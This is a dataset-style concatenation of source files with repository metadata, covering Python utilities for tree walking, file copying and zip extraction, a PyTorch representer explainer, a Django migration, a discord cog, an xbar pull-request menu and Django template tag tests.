getNextSibling: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
yieldCondition: Callable[[TreeNode, int], bool], function(treeNode: TreeNode, depth: int) -> bool.
includeRoot: bool, if True yield root first.
maxDepth: int, enum depth.
If getChildren is valid, ignore getFirstChild and getNextSibling,
yield 3 items tuple: (treeNode, depth, remain children count in current depth).
If getChildren is not valid, using getFirstChild and getNextSibling,
yield 2 items tuple: (treeNode, depth).
If yieldCondition is not None, only yield tree nodes that yieldCondition(treeNode: TreeNode, depth: int)->bool returns True.
For example:
def GetDirChildren(dir_):
if os.path.isdir(dir_):
return [os.path.join(dir_, it) for it in os.listdir(dir_)]
for it, depth, leftCount in WalkTree('D:\\', getChildren= GetDirChildren):
print(it, depth, leftCount)
"""
if maxDepth <= 0:
return
depth = 0
if getChildren:
if includeRoot:
if not yieldCondition or yieldCondition(root, 0):
yield root, 0, 0
children = getChildren(root)
childList = [children]
while depth >= 0: # or while childList:
lastItems = childList[-1]
if lastItems:
if not yieldCondition or yieldCondition(lastItems[0], depth + 1):
yield lastItems[0], depth + 1, len(lastItems) - 1
if depth + 1 < maxDepth:
children = getChildren(lastItems[0])
if children:
depth += 1
childList.append(children)
del lastItems[0]
else:
del childList[depth]
depth -= 1
elif getFirstChild and getNextSibling:
if includeRoot:
if not yieldCondition or yieldCondition(root, 0):
yield root, 0
child = getFirstChild(root)
childList = [child]
while depth >= 0: # or while childList:
lastItem = childList[-1]
if lastItem:
if not yieldCondition or yieldCondition(lastItem, depth + 1):
yield lastItem, depth + 1
child = getNextSibling(lastItem)
childList[depth] = child
if depth + 1 < maxDepth:
child = getFirstChild(lastItem)
if child:
depth += 1
childList.append(child)
else:
del childList[depth]
depth -= 1
def listDir(path: Tuple[str, bool, str]) -> List[Tuple[str, bool, str]]:
'''returns Tuple[filePath:str, isDir:bool, fileName:str]'''
if path[1]:
files = []
files2 = []
for it in os.listdir(path[0]):
childPath = os.path.join(path[0], it)
if os.path.isdir(childPath):
files.append((childPath, True, it))
else:
files2.append((childPath, False, it))
files.extend(files2)
return files
def walkDir(absDir: str, maxDepth: int = 0xFFFFFFFF) -> Iterator[Tuple[str, bool, str, int, int]]:
for (filePath, isDir, fileName), depth, remainCount in walkTree((absDir, True, ''), getChildren=listDir, includeRoot=False, maxDepth=maxDepth):
yield filePath, isDir, fileName, depth, remainCount
def copyFile(src: str, dst: str, log: bool = True) -> None:
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
else:
if dst[-1] == '\\' or dst[-1] == '/':
dirPath = dst
dst = dirPath + os.path.basename(src)
else:
dirPath = os.path.dirname(dst)
if dirPath and not os.path.exists(dirPath):
os.makedirs(dirPath)
shutil.copyfile(src, dst)
if log:
print(f'copy file: {src}\n -> {dst}')
def copyDir(src: str, dst: str, log: bool = True) -> int:
"""return int, files count"""
if src[-1] == os.path.sep:
src = src[:-1]
if dst[-1] != os.path.sep:
dst = dst + os.sep
srcLen = len(src)
if not os.path.exists(dst):
os.makedirs(dst)
fileCount = 0
for filePath, isDir, fileName, depth, remainCount in walkDir(src):
relativeName = filePath[srcLen + 1:]
dstPath = dst + relativeName
if isDir:
if not os.path.exists(dstPath):
os.makedirs(dstPath)
if log:
print(f'create dir: {dstPath}')
else:
shutil.copyfile(filePath, dstPath) # dstPath's dir must exists, will over write dstPath if dstPath exists
fileCount += 1
if log:
print(f'copy file {fileCount}: {dstPath}')
def renameFilesInDir(src: str, find: str, replace: str, log: bool = True) -> int:
"""return int, files count that are renamed"""
fileCount = 0
for filePath, isDir, fileName, depth, remainCount in walkDir(src):
if not isDir:
newFileName = fileName.replace(find, replace)
if fileName != newFileName:
newFilePath = filePath[:len(filePath) - len(fileName)] + newFileName
if os.path.exists(newFilePath):
os.remove(newFilePath)
os.rename(filePath, newFilePath)
fileCount += 1
if log:
print(f'{fileCount}: {filePath}\n -> {newFilePath}, file renamed')
def walkZip(zipPath: str, getFileObjCondition: Callable[[zipfile.ZipInfo], bool] = None) -> Iterator[Tuple[bool, zipfile.ZipInfo, zipfile.ZipExtFile]]:
"""
getFileObjCondition: getFileObjCondition(fileName:str)->bool
return tuple(isDir:bool, zipInfo:ZipInfo, fileObj:ZipExtFile)
zipInfo.is_dir(), zipInfo.filename, ...
"""
with zipfile.ZipFile(zipPath, 'r') as zin:
for zipInfo in zin.infolist():
if zipInfo.is_dir():
yield True, zipInfo, None
else:
if getFileObjCondition and getFileObjCondition(zipInfo):
with zin.open(zipInfo.filename, 'r') as fin:
yield False, zipInfo, fin
# shutil.copyfileobj(fin, fout, 512000) # avoid too much memory, default 1MB if pass 0 to 3rd parameter
else:
yield False, zipInfo, None
def extractOneFileInZip(zipPath: str, dstDir: str, fileEnd: str, log: bool = True) -> bool:
"""
fileEnd: str.
dstDir: str, should end with \\(not must).
"""
if dstDir[-1] != os.sep:
dstDir = dstDir + os.sep
if not os.path.exists(dstDir):
os.makedirs(dstDir)
for isDir, zipInfo, zipFile in walkZip(zipPath, lambda zInfo: zInfo.filename.endswith(fileEnd)):
if zipFile:
dstPath = dstDir + os.path.basename(fileEnd)
with open(dstPath, 'wb') as fout:
shutil.copyfileobj(zipFile, fout)
if log:
print(f'copy file: {dstPath}')
return True
return False
def extractZip(zipPath: str, dstDir: str, subDir: str = None, log: bool = True) -> int:
"""
subDir: str, if None, extrac all contents to dstDir, if not None, must not be end with / and can not use \\ in subDir.
dstDir: str, should end with \\(not must).
returns int, files count.
"""
if dstDir[-1] != os.sep:
dstDir = dstDir + os.sep
fileCount = 0
if not subDir:
for isDir, zipInfo, zipFile in walkZip(zipPath, lambda zInfo: True):
if isDir:
dstPath = dstDir + zipInfo.filename
if not os.path.exists(dstPath):
os.makedirs(dstPath)
if log:
print(f'create dir: {dstPath}')
else:
dstPath = dstDir + zipInfo.filename
with open(dstPath, 'wb') as fout:
shutil.copyfileobj(zipFile, fout)
fileCount += 1
if log:
print(f'copy file {fileCount}: {dstPath}')
return fileCount
def checkFunc(zipInfo: zipfile.ZipInfo) -> bool:
return subDir in zipInfo.filename
foundDir = False
for isDir, zipInfo, zipFile in walkZip(zipPath, checkFunc):
if isDir:
index = zipInfo.filename.find(subDir)
if not foundDir and index >= 0:
foundDir = True
if foundDir:
if index < 0:
break
createDir = dstDir + zipInfo.filename[index + len(subDir) + 1:]
if not os.path.exists(createDir):
os.makedirs(createDir)
if log:
print(f'create dir: {createDir}')
else:
if zipFile:
index = zipInfo.filename.find(subDir)
dstPath = dstDir + zipInfo.filename[index + len(subDir) + 1:]
with open(dstPath, 'wb') as fout:
shutil.copyfileobj(zipFile, fout)
fileCount += 1
if log:
print(f'copy file {fileCount}: {dstPath}')
else:
if foundDir:
break
return fileCount
def getDpiScale() -> float:
if sys.platform == 'win32':
user32 = ctypes.windll.user32
gdi32 = ctypes.windll.gdi32
dc = user32.GetDC(None)
widthScale = gdi32.GetDeviceCaps(dc, 8)
# heightScale = gdi32.GetDeviceCaps(dc, 10)
width = gdi32.GetDeviceCaps(dc, 118)
# height = gdi32.GetDeviceCaps(dc, 117)
user32.ReleaseDC(None, dc)
return width / widthScale
return 1
# def getLocalIP() -> str:
# ip = ''
# try:
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.connect(('8.8.8.8', 80))
# ip = s.getsockname()[0]
# finally:
# s.close()
# return ip
def fileSize2Str(sizeInBytes: int) -> str:
if sizeInBytes >= 1073741824: # 1024**3
return f'{sizeInBytes/1073741824:.2f} GB'
elif sizeInBytes >= 1048576: # 1024**2
return f'{sizeInBytes/1048576:.2f} MB'
elif sizeInBytes >= 1024:
return f'{sizeInBytes/1024:.2f} KB'
elif sizeInBytes > 1:
return f'{sizeInBytes} Bytes'
else:
return f'{sizeInBytes} Byte'
def getFileSizeStr(path: str) -> str:
sizeInBytes = os.path.getsize(path)
return fileSize2Str(sizeInBytes)
if __name__ == '__main__':
print(1, 2, 3)
| 3,773 | 0 | 372 |
ab2e2e05cac1d8b78c98df686d33b8380319786a | 2,482 | py | Python | explainers/representer.py | gmatt/Simplex | 787f01a83783835137819110a309b46dc66418db | [
"Apache-2.0"
] | 10 | 2021-11-01T02:32:04.000Z | 2022-01-27T17:24:06.000Z | explainers/representer.py | gmatt/Simplex | 787f01a83783835137819110a309b46dc66418db | [
"Apache-2.0"
] | 1 | 2022-01-06T20:18:15.000Z | 2022-01-28T14:13:44.000Z | explainers/representer.py | gmatt/Simplex | 787f01a83783835137819110a309b46dc66418db | [
"Apache-2.0"
] | 6 | 2021-11-23T03:08:25.000Z | 2022-02-22T03:02:34.000Z | import torch
| 42.793103 | 120 | 0.680902 | import torch
class Representer:
def __init__(self, corpus_latent_reps: torch.Tensor, corpus_probas: torch.Tensor, corpus_true_classes: torch.Tensor,
reg_factor: float) -> None:
"""
Initialize a representer theorem explainer
:param corpus_latent_reps: corpus latent representations
:param corpus_probas: the probabilities predicted by the black-box for the corpus examples
:param corpus_true_classes: the true classes associated to each corpus example
:param reg_factor: the weight decay factor used in training the black-box model
"""
self.corpus_latent_reps = corpus_latent_reps
self.corpus_probas = corpus_probas
self.corpus_true_classes = corpus_true_classes
self.reg_factor = reg_factor
self.corpus_size, self.dim_latent = corpus_latent_reps.shape
self.num_classes = corpus_probas.shape[-1]
self.test_latent_reps = None
self.test_size = None
self.weights = None
def fit(self, test_latent_reps: torch.Tensor) -> None:
"""
Fit the representer theorem explainer on test examples
:param test_latent_reps: test example latent representations
:return:
"""
self.test_latent_reps = test_latent_reps
self.test_size = test_latent_reps.shape[0]
projections = torch.einsum('ij,kj -> ik', test_latent_reps, self.corpus_latent_reps)
projections = projections.view(self.test_size, self.corpus_size, 1)
alpha = (self.corpus_true_classes - self.corpus_probas)/(2*self.reg_factor*self.corpus_size)
alpha = alpha.view(1, self.corpus_size, self.num_classes)
self.weights = alpha * projections
def output_approx(self) -> torch.Tensor:
"""
Returns the representer theorem approximation of the test outputs
:return:
"""
output_approx = self.weights.sum(dim=1)
return output_approx
def to(self, device: torch.device) -> None:
"""
Transfer the tensors to device
:param device: the device where the tensors should be transferred
:return:
"""
self.corpus_latent_reps = self.corpus_latent_reps.to(device)
self.corpus_probas = self.corpus_probas.to(device)
self.corpus_true_classes = self.corpus_true_classes.to(device)
self.test_latent_reps = self.test_latent_reps.to(device)
self.weights = self.weights.to(device)
| 0 | 2,445 | 23 |
bde34ca3526e7f51ff2fa0a0e40bdfa61e94305e | 1,097 | py | Python | src/psiz/utils/rotation_matrix.py | greenfieldvision/psiz | 37068530a78e08792e827ee55cf55e627add115e | [
"Apache-2.0"
] | 21 | 2020-04-03T21:10:05.000Z | 2021-12-02T01:31:11.000Z | src/psiz/utils/rotation_matrix.py | greenfieldvision/psiz | 37068530a78e08792e827ee55cf55e627add115e | [
"Apache-2.0"
] | 14 | 2020-04-10T00:48:02.000Z | 2021-05-25T18:06:55.000Z | psiz/utils/rotation_matrix.py | rgerkin/psiz | d540738462b6436a08a472d5e349ca2b813e6d47 | [
"Apache-2.0"
] | 4 | 2020-10-13T16:46:14.000Z | 2021-11-10T00:08:47.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 The PsiZ Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Module of utility functions.
Functions:
rotation_matrix: Returns a two-dimensional rotation matrix.
"""
import numpy as np
def rotation_matrix(theta):
"""Return 2D rotation matrix.
Arguments:
theta: Scalar value indicating radians of rotation.
"""
return np.array((
(np.cos(theta), -np.sin(theta)),
(np.sin(theta), np.cos(theta)),
))
| 29.648649 | 78 | 0.655424 | # -*- coding: utf-8 -*-
# Copyright 2020 The PsiZ Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Module of utility functions.
Functions:
rotation_matrix: Returns a two-dimensional rotation matrix.
"""
import numpy as np
def rotation_matrix(theta):
"""Return 2D rotation matrix.
Arguments:
theta: Scalar value indicating radians of rotation.
"""
return np.array((
(np.cos(theta), -np.sin(theta)),
(np.sin(theta), np.cos(theta)),
))
| 0 | 0 | 0 |
0bbeffa00ad38c43587387598ac50be666e90d9a | 462 | py | Python | discordCommands/hello.py | asoji/Yiski | 8c64a04bb4e3b3f72a70de28203be2c3618c5f9c | [
"MIT"
] | null | null | null | discordCommands/hello.py | asoji/Yiski | 8c64a04bb4e3b3f72a70de28203be2c3618c5f9c | [
"MIT"
] | 11 | 2022-01-27T08:02:41.000Z | 2022-02-10T23:32:29.000Z | discordCommands/hello.py | asoji/Yiski | 8c64a04bb4e3b3f72a70de28203be2c3618c5f9c | [
"MIT"
] | 1 | 2022-01-27T06:11:48.000Z | 2022-01-27T06:11:48.000Z | from discord.ext import commands
from loguru import logger
from mainDiscord import embedCreator
| 25.666667 | 111 | 0.712121 | from discord.ext import commands
from loguru import logger
from mainDiscord import embedCreator
class HelloDiscord(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
async def hello(self, ctx):
await ctx.send(embed=embedCreator("Hello World!", f"& Howdy Nerd, aka {ctx.author.mention}", 0x00ff00))
def setup(client):
client.add_cog(HelloDiscord(client))
logger.debug("Hello Cog loaded.")
| 229 | 89 | 46 |
a3b12a22896d70cbbefc9e7e1dafb2be8fc7279c | 78 | py | Python | tests/roots/test-maxlistdepth/conf.py | samdoran/sphinx | 4c91c038b220d07bbdfe0c1680af42fe897f342c | [
"BSD-2-Clause"
] | 4,973 | 2015-01-03T15:44:00.000Z | 2022-03-31T03:11:51.000Z | tests/roots/test-maxlistdepth/conf.py | samdoran/sphinx | 4c91c038b220d07bbdfe0c1680af42fe897f342c | [
"BSD-2-Clause"
] | 7,850 | 2015-01-02T08:09:25.000Z | 2022-03-31T18:57:40.000Z | tests/roots/test-maxlistdepth/conf.py | samdoran/sphinx | 4c91c038b220d07bbdfe0c1680af42fe897f342c | [
"BSD-2-Clause"
] | 2,179 | 2015-01-03T15:26:53.000Z | 2022-03-31T12:22:44.000Z | exclude_patterns = ['_build']
latex_elements = {
'maxlistdepth': '10',
}
| 13 | 29 | 0.641026 | exclude_patterns = ['_build']
latex_elements = {
'maxlistdepth': '10',
}
| 0 | 0 | 0 |
acdf93786f95a7945c8913e5d9f8076e4683bcb1 | 2,174 | py | Python | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | null | null | null | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 16 | 2020-03-11T08:25:46.000Z | 2022-03-02T08:14:40.000Z | disturbance/migrations/0267_auto_20210711_1208.py | jawaidm/disturbance | 4188e816239b9447a58a987d16dd0f05bc6aad53 | [
"Apache-2.0"
] | 9 | 2020-01-30T17:37:38.000Z | 2021-09-30T02:22:24.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-07-11 04:08
from __future__ import unicode_literals
from django.db import migrations, models
| 32.939394 | 73 | 0.587856 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-07-11 04:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('disturbance', '0266_auto_20210708_1640'),
]
operations = [
migrations.AddField(
model_name='apiarysiteonapproval',
name='approval_cpc_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='approval_minister_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='batch_no',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='catchment',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='cog',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='dra_permit',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='forest_block',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='map_ref',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='roadtrack',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='apiarysiteonapproval',
name='zone',
field=models.CharField(blank=True, max_length=40, null=True),
),
]
| 0 | 1,994 | 23 |
d4975d812aa56d965dedc021abeae297e292f266 | 1,650 | py | Python | build/android/adb_profile_xwalk.py | gaurangkumar/crosswalk | 1b9b80835e83e77390bd6cdbc03beb63f2a6f550 | [
"BSD-3-Clause"
] | 2,211 | 2015-01-01T08:50:09.000Z | 2022-03-30T02:48:16.000Z | build/android/adb_profile_xwalk.py | gaurangkumar/crosswalk | 1b9b80835e83e77390bd6cdbc03beb63f2a6f550 | [
"BSD-3-Clause"
] | 1,269 | 2015-01-02T10:43:16.000Z | 2020-01-17T00:58:09.000Z | build/android/adb_profile_xwalk.py | gaurangkumar/crosswalk | 1b9b80835e83e77390bd6cdbc03beb63f2a6f550 | [
"BSD-3-Clause"
] | 585 | 2015-01-02T01:12:15.000Z | 2022-03-09T07:07:18.000Z | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Copyright (c) 2014 Intel Corporation. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
chrome_src = os.environ['CHROME_SRC']
chrome_tool_path = os.path.join(chrome_src, 'build', 'android')
sys.path.append(chrome_tool_path)
# Below two modules should be imported at runtime, but pylint can not find it,
# add below pylint attribute to ignore this error.
#
# pylint: disable=F0401
import adb_profile_chrome
from pylib import constants
# Wrapper for package info, the key 'stable' is needed by adb_profile_chrome.
PACKAGE_INFO = {
'xwalk_embedded_shell': constants.PackageInfo(
'org.xwalk.runtime.client.embedded.shell',
'org.xwalk.runtime.client.embedded.shell'
'.XWalkRuntimeClientEmbeddedShellActivity',
'/data/local/tmp/xwview-shell-command-line',
None,
None),
}
if __name__ == '__main__':
sys.exit(main())
| 29.464286 | 78 | 0.749697 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Copyright (c) 2014 Intel Corporation. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
chrome_src = os.environ['CHROME_SRC']
chrome_tool_path = os.path.join(chrome_src, 'build', 'android')
sys.path.append(chrome_tool_path)
# Below two modules should be imported at runtime, but pylint can not find it,
# add below pylint attribute to ignore this error.
#
# pylint: disable=F0401
import adb_profile_chrome
from pylib import constants
# Wrapper for package info, the key 'stable' is needed by adb_profile_chrome.
PACKAGE_INFO = {
'xwalk_embedded_shell': constants.PackageInfo(
'org.xwalk.runtime.client.embedded.shell',
'org.xwalk.runtime.client.embedded.shell'
'.XWalkRuntimeClientEmbeddedShellActivity',
'/data/local/tmp/xwview-shell-command-line',
None,
None),
}
def _GetSupportedBrowsers():
# Add aliases for backwards compatibility.
supported_browsers = {
'stable': PACKAGE_INFO['xwalk_embedded_shell']
}
supported_browsers.update(constants.PACKAGE_INFO)
unsupported_browsers = ['content_browsertests', 'gtest', 'legacy_browser']
for browser in unsupported_browsers:
del supported_browsers[browser]
return supported_browsers
def main():
adb_profile_chrome._GetSupportedBrowsers = _GetSupportedBrowsers
adb_profile_chrome.main()
if __name__ == '__main__':
sys.exit(main())
| 449 | 0 | 46 |
97eac6d4984d6c7cf82f679600d677aae6b3f6a2 | 814 | py | Python | setup.py | interactions-py/enhanced | d9799464bdab23c171fe790dd7a763ac9dd92eee | [
"MIT"
] | 4 | 2022-03-12T03:14:12.000Z | 2022-03-23T15:56:14.000Z | setup.py | interactions-py/enhanced | d9799464bdab23c171fe790dd7a763ac9dd92eee | [
"MIT"
] | 2 | 2022-03-16T02:21:08.000Z | 2022-03-29T03:18:59.000Z | setup.py | interactions-py/enhanced | d9799464bdab23c171fe790dd7a763ac9dd92eee | [
"MIT"
] | null | null | null | from setuptools import setup
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="enhanced",
version="4.0.0",
description="Enhanced interactions for interactions.py",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/interactions-py/enhanced",
author="Toricane",
author_email="prjwl028@gmail.com",
license="MIT",
packages=["interactions.ext.enhanced"],
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
"discord-py-interactions>=4.1.1rc.1",
"typing_extensions",
],
)
| 29.071429 | 60 | 0.644963 | from setuptools import setup
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="enhanced",
version="4.0.0",
description="Enhanced interactions for interactions.py",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/interactions-py/enhanced",
author="Toricane",
author_email="prjwl028@gmail.com",
license="MIT",
packages=["interactions.ext.enhanced"],
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
"discord-py-interactions>=4.1.1rc.1",
"typing_extensions",
],
)
| 0 | 0 | 0 |
739a497ac7f435d24ff346cd7c79613e917bdbb4 | 5,308 | py | Python | src/python/pull_requests/menu.py | bvdeenen/bitbar | 4bd0876dacecc55f2cb60027510ba47ff7d84d12 | [
"MIT"
] | null | null | null | src/python/pull_requests/menu.py | bvdeenen/bitbar | 4bd0876dacecc55f2cb60027510ba47ff7d84d12 | [
"MIT"
] | null | null | null | src/python/pull_requests/menu.py | bvdeenen/bitbar | 4bd0876dacecc55f2cb60027510ba47ff7d84d12 | [
"MIT"
] | null | null | null | import itertools
from typing import List, Dict
from .config import PullRequestsConstants
from .domain import PullRequest, PullRequestSort, PullRequestStatus, PullRequestsOverview, PullRequestException
from .notification import send_notification_pr
from ..common.config import get_logger
from ..common.icons import Icon, Icons
from ..common.util import get_absolute_path_to_repo_file
logger = get_logger(__name__)
open_multiple_urls = get_absolute_path_to_repo_file('src/open-multiple-urls.sh')
| 41.795276 | 118 | 0.683685 | import itertools
from typing import List, Dict
from .config import PullRequestsConstants
from .domain import PullRequest, PullRequestSort, PullRequestStatus, PullRequestsOverview, PullRequestException
from .notification import send_notification_pr
from ..common.config import get_logger
from ..common.icons import Icon, Icons
from ..common.util import get_absolute_path_to_repo_file
logger = get_logger(__name__)
open_multiple_urls = get_absolute_path_to_repo_file('src/open-multiple-urls.sh')
def sort_pull_requests(pull_requests: List[PullRequest], sort_on: PullRequestSort):
return sorted(pull_requests, key=lambda p: p.activity,
reverse=True) if sort_on == PullRequestSort.ACTIVITY else sorted(pull_requests,
key=lambda p: p['title'])
def determine_repo_status(prs_list: List[PullRequest]):
statuses = [_pr.overall_status for _pr in prs_list]
if PullRequestStatus.REJECTED in statuses:
return PullRequestStatus.REJECTED
elif PullRequestStatus.UNAPPROVED in statuses or PullRequestStatus.NO_VOTE in statuses:
return PullRequestStatus.UNAPPROVED
elif PullRequestStatus.NEEDS_WORK in statuses or PullRequestStatus.WAITING_FOR_AUTHOR in statuses:
return PullRequestStatus.NEEDS_WORK
else: # Approved / Approved with suggestions
return PullRequestStatus.APPROVED
def print_prs(
pr_type,
pull_requests: List[PullRequest],
sort_on: PullRequestSort,
section_icon: Icon,
status_icons: Dict[PullRequestStatus, Icon]):
print(f"{pr_type} | templateImage={section_icon.base64_image}")
print("---")
prs_sorted_by_slug = sorted(pull_requests, key=lambda p: p.slug)
for repo, repo_prs in itertools.groupby(prs_sorted_by_slug, key=lambda p: p.slug):
repo_prs_list: List[PullRequest] = list(repo_prs)
repo_status = determine_repo_status(repo_prs_list)
repo_href = repo_prs_list[0].all_prs_href
print(f"{repo} ({str(len(repo_prs_list))}) | href={repo_href} image={status_icons[repo_status].base64_image}")
prs_sorted_by_to_ref = sorted(repo_prs_list, key=lambda p: p.to_ref)
pr_urls = list()
for to_ref, to_ref_prs in itertools.groupby(prs_sorted_by_to_ref, key=lambda p: p.to_ref):
to_ref_prs_list: List[PullRequest] = sort_pull_requests(list(to_ref_prs), sort_on)
print(f"--{to_ref}")
for _pr in to_ref_prs_list:
print(f"--{_pr.from_ref} -- {_pr.title} (#{_pr.id}) - {_pr.time_ago}" +
f"|href={_pr.href} image={status_icons[_pr.overall_status].base64_image}")
pr_urls.append(_pr.href)
# Alternate click (option click to open all)
print(
(f"{repo} (open {str(len(repo_prs_list))} PRs) |"
"alternate=true "
f"image={status_icons[repo_status].base64_image} "
f"bash={open_multiple_urls} param1='{' '.join(pr_urls)}' "
"terminal=false"
)
)
def print_xbar_pull_request_menu(
pr_overview: PullRequestsOverview,
pr_statuses: Dict[PullRequestStatus, Icon],
sort_on: PullRequestSort,
cache_file: str,
notifications_enabled: bool
):
total_prs_to_review = len(pr_overview.prs_to_review)
total_prs_authored_with_work = len(pr_overview.prs_authored_with_work)
total_prs = total_prs_to_review + total_prs_authored_with_work
if total_prs > 0:
print(f"{str(total_prs)} | templateImage={Icons.PULL_REQUEST.base64_image}")
if total_prs_to_review > 0:
print("---")
print_prs("Reviewing", pr_overview.prs_to_review, sort_on, Icons.REVIEW, pr_statuses)
if total_prs_authored_with_work > 0:
print("---")
print_prs("Authored", pr_overview.prs_authored_with_work, sort_on, Icons.AUTHORED, pr_statuses)
if len(pr_overview.exceptions) > 0:
print_and_log_exceptions(pr_overview.exceptions)
if notifications_enabled:
previous_pr_status = PullRequestsOverview.load_cached(cache_file)
new, changed = pr_overview.determine_new_and_changed_pull_requests_to_review(previous_pr_status)
for pr in new:
send_notification_pr("New", pr.slug, pr.from_ref, pr.to_ref, pr.title, pr.href)
for pr in changed:
send_notification_pr("Changed", pr.slug, pr.from_ref, pr.to_ref, pr.title, pr.href)
pr_overview.store(cache_file)
elif total_prs == 0 and len(pr_overview.exceptions) == 0:
print(f"0 | templateImage={Icons.PULL_REQUEST.base64_image}")
print("---")
print(f"Nothing to review 🎉 | templateImage={PullRequestsConstants.NO_PULL_REQUESTS.base64_image}")
pr_overview.store(cache_file)
else:
print(f"? | templateImage={Icons.PULL_REQUEST.base64_image}")
print_and_log_exceptions(pr_overview.exceptions)
def print_and_log_exceptions(exceptions: List[PullRequestException]):
for exception in exceptions:
logger.error(exception.exception)
logger.error(exception.traceback)
print("---")
print(f"{exception.source} error: {exception.message}")
| 4,695 | 0 | 115 |
fda7626c94b77811ec4a56e243a28182a9495ac4 | 4,598 | py | Python | tests/posts_templatetags/tests.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | tests/posts_templatetags/tests.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | tests/posts_templatetags/tests.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.test import SimpleTestCase
from yepes.test_mixins import TemplateTagsMixin
from marchena.modules.posts.templatetags.posts import (
CalendarTag,
GetArchivesTag,
GetCategoryTag,
GetCategoriesTag,
GetNextPostTag,
GetPopularPostsTag,
GetPostTag,
GetPostsTag,
GetPreviousPostTag,
GetRecentPostsTag,
GetRelatedPostsTag,
GetTagTag,
GetTagsTag,
LastModificationTag,
LastPublicationTag,
NextPostLinkTag,
PostAuthorsTag,
PostCategoriesTag,
PostTagsTag,
PreviousPostLinkTag,
TagCloudTag,
)
| 28.036585 | 115 | 0.597434 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.test import SimpleTestCase
from yepes.test_mixins import TemplateTagsMixin
from marchena.modules.posts.templatetags.posts import (
CalendarTag,
GetArchivesTag,
GetCategoryTag,
GetCategoriesTag,
GetNextPostTag,
GetPopularPostsTag,
GetPostTag,
GetPostsTag,
GetPreviousPostTag,
GetRecentPostsTag,
GetRelatedPostsTag,
GetTagTag,
GetTagsTag,
LastModificationTag,
LastPublicationTag,
NextPostLinkTag,
PostAuthorsTag,
PostCategoriesTag,
PostTagsTag,
PreviousPostLinkTag,
TagCloudTag,
)
class PostsTagsTest(TemplateTagsMixin, SimpleTestCase):
requiredLibraries = ['posts']
def test_calendar_syntax(self):
self.checkSyntax(
CalendarTag,
'{% calendar[ year[ month[ user]]] %}',
)
def test_get_archives_syntax(self):
self.checkSyntax(
GetArchivesTag,
'{% get_archives[ period[ user[ ordering]]][ as variable_name] %}',
)
def test_get_category_syntax(self):
self.checkSyntax(
GetCategoryTag,
'{% get_category category_slug[ blog][ as variable_name] %}',
)
def test_get_categories_syntax(self):
self.checkSyntax(
GetCategoriesTag,
'{% get_categories *category_slugs[ blog][ as variable_name] %}',
)
def test_get_next_post_syntax(self):
self.checkSyntax(
GetNextPostTag,
